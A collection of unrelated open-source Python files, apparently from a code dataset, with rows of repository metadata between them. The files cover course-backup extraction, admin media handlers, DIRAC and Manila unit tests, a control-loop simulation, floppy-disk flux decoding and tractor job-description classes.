'SELECT submissionid,userid,timemodified,data,grade,comment,teacher,timemarked FROM assignment_submissions WHERE activityid=? ORDER BY timemodified DESC', (self.current_id,))
sub_results = self.db_cursor.fetchall()
submissions = []
if results[5] == 'online' or results[5] == 'offline':
# extract online text
for sub in sub_results:
# grab name of student from db
self.db_cursor.execute(
'SELECT firstname,lastname FROM users WHERE userid=?', (sub[1],))
user = self.db_cursor.fetchone()
username = user[0] + " " + user[1]
# grab name of teacher from db
self.db_cursor.execute(
'SELECT firstname,lastname FROM users WHERE userid=?', (sub[6],))
teacher = self.db_cursor.fetchone()
if teacher is not None:
grader = teacher[0] + " " + teacher[1]
else:
grader = ""
# construct submission
submissions.append({'id': sub[0],
'user': username,
'timemodified': datetime.fromtimestamp(sub[2]),
'data': sub[3],
'grade': sub[4],
'comment': sub[5],
'teacher': grader,
'timemarked': sub[7]})
template = self.env.get_template('online_text.html')
output = template.render(name=results[3],
intro=results[4],
student_data=self.student_data,
submissions=submissions)
os.chdir(path)
with open('assignment.html', 'w+') as f:
f.write(output)
f.close()
elif results[5] == 'upload' or results[5] == 'uploadsingle':
for sub in sub_results:
# grab name of student from db
self.db_cursor.execute(
'SELECT firstname,lastname FROM users WHERE userid=?', (sub[1],))
user = self.db_cursor.fetchone()
username = user[0] + " " + user[1]
# grab name of teacher from db
self.db_cursor.execute(
'SELECT firstname,lastname FROM users WHERE userid=?', (sub[6],))
teacher = self.db_cursor.fetchone()
if teacher is not None:
grader = teacher[0] + " " + teacher[1]
else:
grader = ""
# construct submission
submissions.append({'id': sub[0],
'user': username,
'timemodified': datetime.fromtimestamp(sub[2]),
'grade': sub[4],
'comment': sub[5],
'teacher': grader,
'timemarked': sub[7]})
# grab all files submitted by this student
self.db_cursor.execute(
'SELECT contenthash,contextid,filename,userid FROM files WHERE userid=? AND contextid=?', (sub[1], results[2]))
files = self.db_cursor.fetchall()
submitted_files = []
if files is not None:
for f in files:
os.chdir(self.temp_dir)
if not os.path.exists(os.path.join(path, username)):
os.makedirs(os.path.join(path, username))
self.backup.extract_file(
f[0], os.path.join(path, username, f[2]))
# construct file list
submitted_files.append(
{'url':os.path.join(username, f[2]), 'filename': f[2]})
# write the output assignment.html
template = self.env.get_template('upload.html')
output = template.render(name=results[3],
intro=results[4],
student_data=self.student_data,
submissions=submissions,
files=submitted_files)
os.chdir(path)
f = open('assignment.html', 'w+')
f.write(output)
f.close()
| mit | -2,250,443,401,529,729,000 | 48.123596 | 222 | 0.483074 | false |
synth3tk/the-blue-alliance | controllers/admin/admin_media_controller.py | 1 | 3104 | import json
import logging
import os
from google.appengine.ext.webapp import template
from controllers.base_controller import LoggedInHandler
from helpers.media_helper import MediaParser
from helpers.media_manipulator import MediaManipulator
from models.media import Media
class AdminMediaDashboard(LoggedInHandler):
"""
Show stats about Media
"""
def get(self):
self._require_admin()
media_count = Media.query().count()
self.template_values.update({
"media_count": media_count
})
path = os.path.join(os.path.dirname(__file__), '../../templates/admin/media_dashboard.html')
self.response.out.write(template.render(path, self.template_values))
class AdminMediaDeleteReference(LoggedInHandler):
def post(self, media_key_name):
self._require_admin()
media = Media.get_by_id(media_key_name)
media.references.remove(media.create_reference(
self.request.get("reference_type"),
self.request.get("reference_key_name")))
MediaManipulator.createOrUpdate(media, auto_union=False)
self.redirect(self.request.get('originating_url'))
class AdminMediaMakePreferred(LoggedInHandler):
def post(self, media_key_name):
self._require_admin()
media = Media.get_by_id(media_key_name)
media.preferred_references.append(media.create_reference(
self.request.get("reference_type"),
self.request.get("reference_key_name")))
MediaManipulator.createOrUpdate(media)
self.redirect(self.request.get('originating_url'))
class AdminMediaRemovePreferred(LoggedInHandler):
def post(self, media_key_name):
self._require_admin()
media = Media.get_by_id(media_key_name)
media.preferred_references.remove(media.create_reference(
self.request.get("reference_type"),
self.request.get("reference_key_name")))
MediaManipulator.createOrUpdate(media, auto_union=False)
self.redirect(self.request.get('originating_url'))
class AdminMediaAdd(LoggedInHandler):
def post(self):
self._require_admin()
media_dict = MediaParser.partial_media_dict_from_url(self.request.get('media_url').strip())
if media_dict is not None:
year_str = self.request.get('year')
if year_str == '':
year = None
else:
year = int(year_str.strip())
media = Media(
id=Media.render_key_name(media_dict['media_type_enum'], media_dict['foreign_key']),
foreign_key=media_dict['foreign_key'],
media_type_enum=media_dict['media_type_enum'],
details_json=media_dict.get('details_json', None),
year=year,
references=[Media.create_reference(
self.request.get('reference_type'),
self.request.get('reference_key'))],
)
MediaManipulator.createOrUpdate(media)
self.redirect(self.request.get('originating_url'))
| mit | -390,828,834,690,328,260 | 30.673469 | 100 | 0.633054 | false |
ic-hep/DIRAC | Resources/Catalog/ConditionPlugins/test/Test_FilenamePlugin.py | 1 | 1420 | """ Test the FilenamePlugin class"""
import unittest
from DIRAC.Resources.Catalog.ConditionPlugins.FilenamePlugin import FilenamePlugin
__RCSID__ = "$Id $"
class TestfilenamePlugin( unittest.TestCase ):
""" Test the FilenamePlugin class"""
def setUp(self):
self.lfns = [ '/lhcb/lfn1', '/lhcb/anotherlfn', '/otherVo/name']
def test_01_endswith(self):
""" Testing endswith (method with argument"""
fnp = FilenamePlugin("endswith('n')")
self.assert_( not fnp.eval( lfn = '/lhcb/lfn1' ) )
self.assert_( fnp.eval( lfn = '/lhcb/lfn' ) )
def test_02_find( self ):
""" Testing special case of find"""
fnp = FilenamePlugin( "find('lfn')" )
self.assert_( fnp.eval( lfn = '/lhcb/lfn1' ) )
self.assert_( not fnp.eval( lfn = '/lhcb/l0f0n' ) )
def test_03_isalnum( self ):
""" Testing isalnum (method without argument"""
fnp = FilenamePlugin( "isalnum()" )
self.assert_( fnp.eval( lfn = 'lhcblfn1' ) )
self.assert_( not fnp.eval( lfn = '/lhcb/lf_n' ) )
def test_04_nonExisting( self ):
""" Testing non existing string method"""
fnp = FilenamePlugin( "nonexisting()" )
self.assert_( not fnp.eval( lfn = 'lhcblfn1' ) )
self.assert_( not fnp.eval( lfn = '/lhcb/lf_n' ) )
if __name__ == '__main__':
suite = unittest.defaultTestLoader.loadTestsFromTestCase( TestfilenamePlugin )
unittest.TextTestRunner( verbosity = 2 ).run( suite )
| gpl-3.0 | -7,581,871,400,807,415,000 | 25.792453 | 82 | 0.635211 | false |
zang3t5u/DCSC_Robots | dcsc_consensus/scripts/Leader_class.py | 1 | 1041 | from numpy.matlib import *
from numpy.linalg import *
import numpy as np
import time
class Leader:
def __init__(self, kp, kd, dt, state = array([[0], [0], [0], [0]])):
self.A = array([[-kp+kd/dt, -kd/dt, 0, 0], [1, -1, 0, 0], [0, 0, -kp+kd/dt, -kd/dt], [0, 0, 1, -1]])
self.B = array([[kp, 0], [0, 0], [0, kp], [0, 0]])
self.state = state
self.dt = dt
self.kp = kp
self.kd = kd
self.sat = array([[1,float('infinity'),1,float('infinity')]]).T
def step(self,u):
delta = self.A.dot(self.state) + self.B.dot(u)
self.state = self.state + self.dt * minimum ( self.sat , maximum( delta , -self.sat ) )
def stability(self):
ev = eig(self.A)
aminim = array([])
amaxim = [-float('infinity')]
for i in range(len(ev)):
aminim = np.append(aminim,amin(ev[i]))
amaxim = np.append(amaxim,amax(ev[i]))
print min(aminim)
print max(amaxim)
if __name__ == "__main__":
l = Leader(1,0.05,0.1, array([[0, 0, 0, 0]]).T)
l.stability()
while True:
l.step(array([[1,1]]).T)
print l.state.T
time.sleep(l.dt)
| gpl-2.0 | 7,395,056,700,263,450,000 | 23.209302 | 102 | 0.569645 | false |
scality/manila | manila/tests/compute/test_nova.py | 1 | 12412 | # Copyright 2014 Mirantis Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import ddt
import mock
from novaclient import exceptions as nova_exception
from novaclient import utils
from novaclient.v2 import servers as nova_servers
from manila.compute import nova
from manila import context
from manila import exception
from manila import test
from manila.volume import cinder
class Volume(object):
def __init__(self, volume_id):
self.id = volume_id
self.name = volume_id
class Network(object):
def __init__(self, net_id):
self.id = net_id
self.label = 'fake_label_%s' % net_id
class FakeNovaClient(object):
class Servers(object):
def get(self, instance_id):
return {'id': instance_id}
def list(self, *args, **kwargs):
return [{'id': 'id1'}, {'id': 'id2'}]
def create(self, *args, **kwargs):
return {'id': 'created_id'}
def __getattr__(self, item):
return None
class Volumes(object):
def get(self, volume_id):
return Volume(volume_id)
def list(self, detailed, *args, **kwargs):
return [{'id': 'id1'}, {'id': 'id2'}]
def create(self, *args, **kwargs):
return {'id': 'created_id'}
def __getattr__(self, item):
return None
class Networks(object):
def get(self, net_id):
return Network(net_id)
class FixedIPs(object):
def get(self, fixed_ip):
return dict(address=fixed_ip)
def reserve(self, fixed_ip):
return None
def unreserve(self, fixed_ip):
return None
def __init__(self):
self.servers = self.Servers()
self.volumes = self.Volumes()
self.keypairs = self.servers
self.networks = self.Networks()
self.fixed_ips = self.FixedIPs()
@nova.translate_server_exception
def decorated_by_translate_server_exception(self, context, instance_id, exc):
if exc:
raise exc(instance_id)
else:
return 'OK'
@ddt.ddt
class TranslateServerExceptionTestCase(test.TestCase):
def test_translate_server_exception(self):
result = decorated_by_translate_server_exception(
'foo_self', 'foo_ctxt', 'foo_instance_id', None)
self.assertEqual('OK', result)
def test_translate_server_exception_not_found(self):
self.assertRaises(
exception.InstanceNotFound,
decorated_by_translate_server_exception,
'foo_self', 'foo_ctxt', 'foo_instance_id', nova_exception.NotFound)
def test_translate_server_exception_bad_request(self):
self.assertRaises(
exception.InvalidInput,
decorated_by_translate_server_exception,
'foo_self', 'foo_ctxt', 'foo_instance_id',
nova_exception.BadRequest)
@ddt.data(
nova_exception.HTTPNotImplemented,
nova_exception.RetryAfterException,
nova_exception.Unauthorized,
nova_exception.Forbidden,
nova_exception.MethodNotAllowed,
nova_exception.OverLimit,
nova_exception.RateLimit,
)
def test_translate_server_exception_other_exception(self, exc):
self.assertRaises(
exception.ManilaException,
decorated_by_translate_server_exception,
'foo_self', 'foo_ctxt', 'foo_instance_id', exc)
@ddt.ddt
class NovaApiTestCase(test.TestCase):
def setUp(self):
super(NovaApiTestCase, self).setUp()
self.api = nova.API()
self.novaclient = FakeNovaClient()
self.ctx = context.get_admin_context()
self.mock_object(nova, 'novaclient',
mock.Mock(return_value=self.novaclient))
self.mock_object(nova, '_untranslate_server_summary_view',
lambda server: server)
def test_server_create(self):
result = self.api.server_create(self.ctx, 'server_name', 'fake_image',
'fake_flavor', None, None, None)
self.assertEqual('created_id', result['id'])
def test_server_delete(self):
self.mock_object(self.novaclient.servers, 'delete')
self.api.server_delete(self.ctx, 'id1')
self.novaclient.servers.delete.assert_called_once_with('id1')
def test_server_get(self):
instance_id = 'instance_id1'
result = self.api.server_get(self.ctx, instance_id)
self.assertEqual(instance_id, result['id'])
def test_server_get_by_name_or_id(self):
instance_id = 'instance_id1'
server = {'id': instance_id, 'fake_key': 'fake_value'}
self.mock_object(utils, 'find_resource',
mock.Mock(return_value=server))
result = self.api.server_get_by_name_or_id(self.ctx, instance_id)
self.assertEqual(instance_id, result['id'])
utils.find_resource.assert_called_once_with(mock.ANY, instance_id)
@ddt.data(
{'nova_e': nova_exception.NotFound(404),
'manila_e': exception.InstanceNotFound},
{'nova_e': nova_exception.BadRequest(400),
'manila_e': exception.InvalidInput},
)
@ddt.unpack
def test_server_get_failed(self, nova_e, manila_e):
nova.novaclient.side_effect = nova_e
instance_id = 'instance_id'
self.assertRaises(manila_e, self.api.server_get, self.ctx, instance_id)
def test_server_list(self):
self.assertEqual([{'id': 'id1'}, {'id': 'id2'}],
self.api.server_list(self.ctx))
def test_server_pause(self):
self.mock_object(self.novaclient.servers, 'pause')
self.api.server_pause(self.ctx, 'id1')
self.novaclient.servers.pause.assert_called_once_with('id1')
def test_server_unpause(self):
self.mock_object(self.novaclient.servers, 'unpause')
self.api.server_unpause(self.ctx, 'id1')
self.novaclient.servers.unpause.assert_called_once_with('id1')
def test_server_suspend(self):
self.mock_object(self.novaclient.servers, 'suspend')
self.api.server_suspend(self.ctx, 'id1')
self.novaclient.servers.suspend.assert_called_once_with('id1')
def test_server_resume(self):
self.mock_object(self.novaclient.servers, 'resume')
self.api.server_resume(self.ctx, 'id1')
self.novaclient.servers.resume.assert_called_once_with('id1')
def test_server_reboot_hard(self):
self.mock_object(self.novaclient.servers, 'reboot')
self.api.server_reboot(self.ctx, 'id1')
self.novaclient.servers.reboot.assert_called_once_with(
'id1', nova_servers.REBOOT_HARD)
def test_server_reboot_soft(self):
self.mock_object(self.novaclient.servers, 'reboot')
self.api.server_reboot(self.ctx, 'id1', True)
self.novaclient.servers.reboot.assert_called_once_with(
'id1', nova_servers.REBOOT_SOFT)
def test_server_rebuild(self):
self.mock_object(self.novaclient.servers, 'rebuild')
self.api.server_rebuild(self.ctx, 'id1', 'fake_image')
self.novaclient.servers.rebuild.assert_called_once_with('id1',
'fake_image',
None)
def test_instance_volume_attach(self):
self.mock_object(self.novaclient.volumes, 'create_server_volume')
self.api.instance_volume_attach(self.ctx, 'instance_id',
'vol_id', 'device')
self.novaclient.volumes.create_server_volume.\
assert_called_once_with('instance_id', 'vol_id', 'device')
def test_instance_volume_detach(self):
self.mock_object(self.novaclient.volumes, 'delete_server_volume')
self.api.instance_volume_detach(self.ctx, 'instance_id',
'att_id')
self.novaclient.volumes.delete_server_volume.\
assert_called_once_with('instance_id', 'att_id')
def test_instance_volumes_list(self):
self.mock_object(
self.novaclient.volumes, 'get_server_volumes',
mock.Mock(return_value=[Volume('id1'), Volume('id2')]))
self.cinderclient = self.novaclient
self.mock_object(cinder, 'cinderclient',
mock.Mock(return_value=self.novaclient))
result = self.api.instance_volumes_list(self.ctx, 'instance_id')
self.assertEqual(2, len(result))
self.assertEqual('id1', result[0].id)
self.assertEqual('id2', result[1].id)
def test_server_update(self):
self.mock_object(self.novaclient.servers, 'update')
self.api.server_update(self.ctx, 'id1', 'new_name')
self.novaclient.servers.update.assert_called_once_with('id1',
name='new_name')
def test_update_server_volume(self):
self.mock_object(self.novaclient.volumes, 'update_server_volume')
self.api.update_server_volume(self.ctx, 'instance_id', 'att_id',
'new_vol_id')
self.novaclient.volumes.update_server_volume.\
assert_called_once_with('instance_id', 'att_id', 'new_vol_id')
def test_keypair_create(self):
self.mock_object(self.novaclient.keypairs, 'create')
self.api.keypair_create(self.ctx, 'keypair_name')
self.novaclient.keypairs.create.assert_called_once_with('keypair_name')
def test_keypair_import(self):
self.mock_object(self.novaclient.keypairs, 'create')
self.api.keypair_import(self.ctx, 'keypair_name', 'fake_pub_key')
self.novaclient.keypairs.create.\
assert_called_once_with('keypair_name', 'fake_pub_key')
def test_keypair_delete(self):
self.mock_object(self.novaclient.keypairs, 'delete')
self.api.keypair_delete(self.ctx, 'fake_keypair_id')
self.novaclient.keypairs.delete.\
assert_called_once_with('fake_keypair_id')
def test_keypair_list(self):
self.assertEqual([{'id': 'id1'}, {'id': 'id2'}],
self.api.keypair_list(self.ctx))
def test_fixed_ip_get(self):
fixed_ip = 'fake_fixed_ip'
result = self.api.fixed_ip_get(self.ctx, fixed_ip)
self.assertIsInstance(result, dict)
self.assertEqual(fixed_ip, result['address'])
def test_fixed_ip_reserve(self):
fixed_ip = 'fake_fixed_ip'
result = self.api.fixed_ip_reserve(self.ctx, fixed_ip)
self.assertIsNone(result)
def test_fixed_ip_unreserve(self):
fixed_ip = 'fake_fixed_ip'
result = self.api.fixed_ip_unreserve(self.ctx, fixed_ip)
self.assertIsNone(result)
def test_network_get(self):
net_id = 'fake_net_id'
net = self.api.network_get(self.ctx, net_id)
self.assertIsInstance(net, dict)
self.assertEqual(net_id, net['id'])
class ToDictTestCase(test.TestCase):
def test_dict_provided(self):
fake_dict = {'foo_key': 'foo_value', 'bar_key': 'bar_value'}
result = nova._to_dict(fake_dict)
self.assertEqual(fake_dict, result)
def test_obj_provided_with_to_dict_method(self):
expected = {'foo': 'bar'}
class FakeObj(object):
def __init__(self):
self.fake_attr = 'fake_attr_value'
def to_dict(self):
return expected
fake_obj = FakeObj()
result = nova._to_dict(fake_obj)
self.assertEqual(expected, result)
def test_obj_provided_without_to_dict_method(self):
expected = {'foo': 'bar'}
class FakeObj(object):
def __init__(self):
self.foo = expected['foo']
fake_obj = FakeObj()
result = nova._to_dict(fake_obj)
self.assertEqual(expected, result)
| apache-2.0 | -7,645,553,551,109,569,000 | 35.398827 | 79 | 0.609491 | false |
veteman/thepython2blob | floppyinforead.py | 1 | 8961 | #Copyright 2015 B. Johan G. Svensson
#Licensed under the terms of the MIT license (see LICENSE).
from __future__ import division
import string, struct, collections
import fsslib, floppytrack
#import floppyinforead
#dsk = floppyinforead.analyzedisc('j:\\Transfer\\CloudKingdom.fss')
##-Take a coffee break...
#print(floppyinforead.printtable(dsk, 5)) #revolution
#image = floppyinforead.extractimage(dsk,80,2,10) #tracks, sides, sectors, (size=512)
#fid = open('CloudKingdom.data','wb')
#fid.write(image)
#fid.close()
#Create a string type that doesn't fill the screen with data:
class Silentstring(str):
__repr__ = object.__repr__
class Silentlist(list):
__repr__ = object.__repr__
Track = collections.namedtuple('Track', ['trtimedata', 'trsynced', 'trmfmdec', 'sectors'])
Sector = collections.namedtuple('Sector', ['metadata', 'data'])
def sorthelper(a):
try:
return a[0]
except TypeError:
return a
def analyzedisc(fname):
fid = open(fname, 'rb')
floppy = fsslib.Reader(fid)
fid.close()
retlst = Silentlist()
for t in xrange(164):
side = t%2
track = t//2
print "------Track:", track, "Side:", side
retlst.append(analysetrack((side,track), *floppy.gettrack(side, track)))
return retlst
def analysetrack(sidetrck,timedata, indpuls):
print indpuls
bitsout, indexes = floppytrack.syncronize(timedata, indpuls)
dataout, markers, indxp = floppytrack.mfmdecode(bitsout, indexes)
markerpairs, unknownmarkers = floppytrack.lookupaddressmarkers(dataout, markers)
mrkrspairs = floppytrack.revolutionseparate(markerpairs, indxp)
unknownmrkrs = floppytrack.revolutionseparate(unknownmarkers, indxp)
trtimedata = {'timedata' : timedata, 'indpuls' : indpuls}
trsynced = {'rawbits' : bitsout, 'indpuls' : indexes}
trmfmdec = {'data' : dataout, 'markers' : markers, 'indpuls' : indxp}
sectors = Silentlist()
for rev in zip(mrkrspairs, unknownmrkrs):
#print "---INDEX---"
sectors.append(analyserevol(sidetrck, dataout, *rev))
track = Track(trtimedata=trtimedata, trsynced=trsynced, trmfmdec=trmfmdec, sectors=sectors)
return track
def analyserevol(sidetrck, data, mrkrspairs, unknownmrkrs):
markers = mrkrspairs + unknownmrkrs
sortmark = sorted(markers,key=sorthelper)
retlst = Silentlist()
for mark in sortmark:
try:
if len(mark) == 2:
retlst.append(analysesector(sidetrck, mark, data))
else:
print "Unkown type of marker-tuple received!", mark , sidetrck
except TypeError:
retlst.append(analysedudmark(mark, data))
return retlst
def analysesector(sidetrck, mark, data):
#If it's a pair the id-field should always exits - but may be faulty
sectid = floppytrack.addressdecode(mark[0],data)
data, datainfo = floppytrack.dataextract(mark[1],sectid['size'],data)
sector = Sector(metadata=dict(sectid.items() + datainfo.items()), data=Silentstring(data))
return sector
def analysedudmark(mark, data):
print mark
print "dudmark", hex(ord(data[mark]))
themark = data[mark]
if struct.unpack('B',themark)[0] == 0xFE:
# If id-field is truncated: sectid = dict()
sectid = floppytrack.addressdecode(mark,data)
else:
sectid = dict()
sector = Sector(metadata=sectid, data=themark)
return sector
def getinfo(sector,tracknum,sidenum):
probstr = ""
try:
if sector.metadata['side'] != sidenum or sector.metadata['track'] != tracknum:
probstr = "*"
elif len(sector.data) == 1: #This is id-field with no data (data contains only 0xFE)
probstr = "?"
elif len(sector.data) != sector.metadata['size']:
probstr = "T"
elif not sector.metadata['datacrcok']:
probstr = "!" # CRC error
elif sector.metadata['sizecode'] != 2:
probstr = "#" # Unusual sector size
except KeyError:
#Dudmark
if len(sector.data) != 1:
raise ValueError('dudmarks should always have data of length 1')
#Note: This is not a sector number as above - this is hexdata.
return "D" + "{0:02x}".format(ord(sector.data)).upper()
return probstr + str(sector.metadata['sectnum'])
def printtable(disc,rev):
layoutstr='Detection:' + ' '*16
for num in range(1,33):
layoutstr+=string.rjust(str(num),4,' ')
for track in xrange(len(disc)):
tracknum = track//2
sidenum = track%2
layoutstr+='\n'
layoutstr+='Layout Track: '
layoutstr+=string.rjust(str(tracknum),2,'0')
layoutstr+=' Side: ' + str(sidenum) + ': '
if rev < len(disc[track].sectors):
for sectnum in xrange(len(disc[track].sectors[rev])):
layoutstr+=string.rjust(getinfo(disc[track].sectors[rev][sectnum],tracknum,sidenum),4,' ')
layoutstr+='\n'
layoutstr+='\n\n'
layoutstr+='#=Non 512 bytes sectors, !=CRC-Error, ?=Unknown/faulty mark'
layoutstr+='\n'
layoutstr+='*=Track/side numbering is wrong, TI=Truncated ID, TD=Truncated Data'
layoutstr+='\n'
layoutstr+='Only one is shown - increasing priority # -> ! -> * -> ?/TD/TI.'
layoutstr+='\n'
return layoutstr
def extractsector(sector, ntrack, nsides, sectorsize):
data = sector.data
tracknum = ntrack//nsides
sidenum = ntrack%nsides
bad = False
try:
if sector.metadata['track'] != tracknum:
bad = True
if sector.metadata['side'] != sidenum:
bad = True
if not sector.metadata['idcrcok']:
bad = True
if not sector.metadata['datacrcok']:
bad = True
if sector.metadata['size'] != sectorsize:
bad = True
if sector.metadata['size'] > sectorsiz:
data = data[:sectorsiz]
else:
data += '\0'*(sectorsiz - len(data))
except KeyError:
return 0, True, ''
return sector.metadata['sectnum'], bad, data
def extractimage(discstruct,ntracks,nsides,nsectors,sectorsize=512):
disc = discstruct.sectors
ntracksides = ntracks * nsides
validsectors = set(range(1,nsectors + 1))
imagelst = []
badlst = []
missinglst = []
for ntrack in xrange(ntracksides):
imagelst.append([])
badlst.append([])
missinglst.append([])
for nsector in xrange(nsectors):
imagelst[ntrack].append(['\0']*sectorsize)
badlst[ntrack].append(True)
missinglst[ntrack].append(True)
for ntrack, track in enumerate(disc):
for nrev, rev in enumerate(track.sectors):
for nsector, sector in enumerate(rev):
sectnum, bad, data = extractsector(sector, ntrack, nsides, sectorsize)
if not sectnum in validsectors:
continue
if bad:
print 'Bad sector in in-image:',
print 'Track:', ntrack//nsides,
print ' Side:', ntrack%nsides,
print ' Num:', sectnum,
print ' Rev:', nrev
if badlst[ntrack][sectnum - 1]:
imagelst[ntrack][sectnum - 1] = disc[ntrack].sectors[nrev][nsector].data
if type(imagelst[ntrack][sectnum - 1]).__name__ != 'Silentstring':
print "ntrack, sectnum", ntrack, sectnum
print type(imagelst[ntrack][sectnum - 1]).__name__
return imagelst[ntrack][sectnum - 1]
badlst[ntrack][sectnum - 1] = bad
missinglst[ntrack][sectnum - 1] = False
#imagelst[ntrack*nsides + nside][ntrack]
image = Silentstring()
badsectors = []
missingsectors = []
for ntrack in xrange(ntracksides):
for nsector in xrange(nsectors):
try:
image += imagelst[ntrack][nsector]
except:
print "ntrack, nsector", ntrack, nsector
return imagelst[ntrack][nsector]
if missinglst[ntrack][sectnum]:
print 'Missing sector in out-image:',
print 'Track:', ntrack//nsides,
print ' Side:', ntrack%nsides,
print ' Num:', nsector+1
elif badlst[ntrack][nsector]:
print 'Bad sector in out-image:',
print 'Track:', ntrack//nsides,
print ' Side:', ntrack%nsides,
print ' Num:', nsector+1
return image
def savetascsv(disc,track, fname):
floppytrack.savetascsv(disc[track].trtimedata['timedata'], fname)
| mit | -6,355,469,575,399,865,000 | 36.792208 | 106 | 0.582747 | false |
Byron/btractor | src/python/btractor/alf/base.py | 1 | 12523 | #-*-coding:utf-8-*-
"""
@package btractor.alf.base
@brief Base classes for use with tractor
@author Sebastian Thiel
@copyright [GNU Lesser General Public License](https://www.gnu.org/licenses/lgpl.html)
"""
from __future__ import unicode_literals
from butility.future import str
__all__ = ['AlfOperatorMeta', 'AlfOperator', 'AlfTreeOperator']
from butility import (GraphIterator,
Meta)
# ==============================================================================
## @name Alf Base Classes
# ------------------------------------------------------------------------------
## @{
class AlfOperatorMeta(Meta):
"""Metaclass setting up descriptors for accessing stored values based on the schema."""
__slots__ = ()
attr_prefix = '_'
class TypeCheckingDescriptor(object):
"""Checks for a given type and converts appropriately"""
__slots__ = (
'attr', ## Name of the attribute we refer to
'type' ## type of the attribute we refer to
)
iterable_types = (tuple, list, set)
def __init__(self, attr, type):
self.attr = attr
self.type = type
def _attrname(self):
"""@return name of the instance attribute"""
return AlfOperatorMeta.attr_prefix + self.attr
def __get__(self, inst, cls):
"""default-aware getter"""
if inst is None:
return self
# allow access to descriptor itself
try:
return getattr(inst, self._attrname())
except AttributeError:
# return empty lists or None !
# None is used as a marker to indicate a value is not set
if issubclass(self.type, self.iterable_types):
value = self.type()
else:
value = None
# end handle nil type
# cache the value for later
self.__set__(inst, value)
return value
# end handle value is unset
def __set__(self, inst, value):
# None is always allowed as this marks an attribute unset
if value is not None and not isinstance(value, self.type):
# scalar value to list conversion
if issubclass(self.type, self.iterable_types) and not isinstance(value, self.iterable_types):
value = [value]
# end handle scalar conversion
value = self.type(value)
setattr(inst, self._attrname(), value)
# end class TypeCheckingDescriptor
@classmethod
def _setup_descriptors(cls, schema, clsdict):
"""Setup decriptoros to match the given schema. By default we create slots with the schema key
prefixed with underscore, and a descriptor at the place of the key for type verification and conversion
"""
slots = clsdict.get('__slots__')
assert isinstance(slots, (tuple, list)), '__slots__ must be present and tuple or instance'
slots = list(slots)
for key, value_type in schema.iteritems():
slot_var = cls.attr_prefix + key
assert slot_var not in slots, "meta class will add schema keys, you shouldn't do it explicitly"
slots.append(slot_var)
# Allow overrides !
assert key not in clsdict, "metaclass expects no customizations of attr access - try to subclass it"
clsdict[key] = cls.TypeCheckingDescriptor(key, value_type)
# end for each key
clsdict['__slots__'] = slots
def __new__(metacls, name, bases, clsdict):
"""Setup descriptors to facilitate and automate attribute access"""
alf_schema = clsdict.get('alf_schema')
if alf_schema:
for attr in ('options', 'mandatory_options'):
schema = getattr(alf_schema, attr)
if schema:
metacls._setup_descriptors(schema, clsdict)
# end check schema exists
# end for each attr
#end have schema
return Meta.__new__(metacls, name, bases, clsdict)
# end class AlfOperatorMeta
class AlfOperator(object):
"""A base class to help defininig operators"""
__slots__ = ()
__metaclass__ = AlfOperatorMeta
## A schema specifying attributes of the alf command
alf_schema = None
def __init__(self, *args, **kwargs):
"""Initialize this instance with arguments matched against the mandatory and free options
@param args always matched to mandatory arguments.
If there is just one argument and it is a tuple or list, it will be interpreted as *args.
If it is a dict, it will be updating the possibly existing **kwargs.
@param kwargs matched to mandatory arguments first, then to actual options"""
assert self.alf_schema is not None, "subtype must set its alf_schema"
if len(args) == 1:
if isinstance(args[0], dict):
kwargs.update(args[0])
args = tuple()
elif isinstance(args[0], (tuple, list)):
args = args[0]
# end handle packing
# allow dicts as first arguments to support implicit type
args = list(args)
self._parse_mandatory_args(args, kwargs)
self._parse_options(kwargs)
assert len(args) == 0, "Unparsed arguments: %s" % (', '.join(args))
assert len(kwargs) == 0, "Unparsed kwargs: %s" % str(kwargs)
# -------------------------
## @name Subclass Overridable
# @{
def _set_attrs_from_dict(self, schema, kwargs):
"""Set our own attributes from keys and their values in kwargs if it is existing in schema.
Each match will be removed from kwargs.
@return set with matched keys"""
matched = set()
for key, value in kwargs.items():
if not key in schema:
continue
# let descriptor do the type checking
setattr(self, key, value)
del(kwargs[key])
matched.add(key)
# end for each key, value in kwargs
return matched
def _parse_options(self, kwargs):
"""Parse all optional arguments from the list of passed in key-value arguments"""
schema = self.alf_schema.options
if not schema:
return
self._set_attrs_from_dict(schema, kwargs)
def _parse_mandatory_args(self, args, kwargs):
"""Parse all mandatory arguments. If they are not matched in kwargs, they are obtained in order
from args"""
schema = self.alf_schema.mandatory_options
if not schema:
return
# parse named args
matched = self._set_attrs_from_dict(schema, kwargs)
# try to match remaining arguments one by one from args in order
for key in schema.keys():
if key in matched:
continue
if not args:
raise AssertionError("not enough arguments given to parse mandatory arguments - current key: %s" % key)
setattr(self, key, args.pop(0))
matched.add(key)
# end for each key in schema
remaining = set(schema.keys()) - matched
assert len(remaining) == 0, "didn't match the following mandatory arguments: %s" % (', '.join(remaining))
## -- End Subclass Overridable -- @}
# end class AlfOperator
class AlfTreeOperator(AlfOperator, GraphIterator):
"""An operator that sets up a tree of items.
As those items can refer to each other, there is a relation between id and refersto tags of commands and/or
tasks"""
__slots__ = ()
def __str__(self):
"""@return pretty version of self"""
return "%s(title='%s')" % (type(self).__name__, self.title)
# -------------------------
## @name GraphIterator Implementation
# @{
def _predecessors(self, node):
raise NotImplementedError()
def _successors(self, node):
if isinstance(node, AlfTreeOperator):
return node.subtasks
return list()
## -- End GraphIterator Implementation -- @}
# -------------------------
## @name Interface
# @{
def resolve_references(self):
"""Verify task and command relations for consistency, and resolve the Referal with the actual instance.
We also verify that task titles are unique per job
@note for now we only check for duplicate ids and task titles and for invalid references.
We also assume Job scope for IDs, not sub-tasks scope as described in the tractor docs to keep
the implementation simple. Therefore we are more enforcing than tractor, which could be a problem
if static task templates are to be duplicated.
We would have to just implement a recursive breadth first iteration ourselves to have the callbacks
nicely
@note its safe to call it multiple times, which will just update previous occurrences accordingly
@return self
@throws Exception if referrals are inconsistent"""
task_map = dict() # 'task title' => task instance
id_map = dict() # 'id' => Cmd or Task
idrefs = list() # a list of IDrefs or TaskIDRef to resolve
duplicate_tasks = list() # a list of tasks which have the same title
def add_to_idmap(item):
"""Adds given item to idmap but asserts that it doesn't exist there and that id is not None"""
if item.id is None:
return
assert item.id not in id_map, "Item %s has duplicate ID: '%s'" % (item, item.id)
